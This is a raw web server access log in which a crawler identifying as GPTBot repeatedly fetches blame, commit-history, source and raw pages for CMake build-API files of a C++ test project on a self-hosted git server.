"/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14294] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14576] [Gzip 9.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10631] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10306] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:47 +0000] - 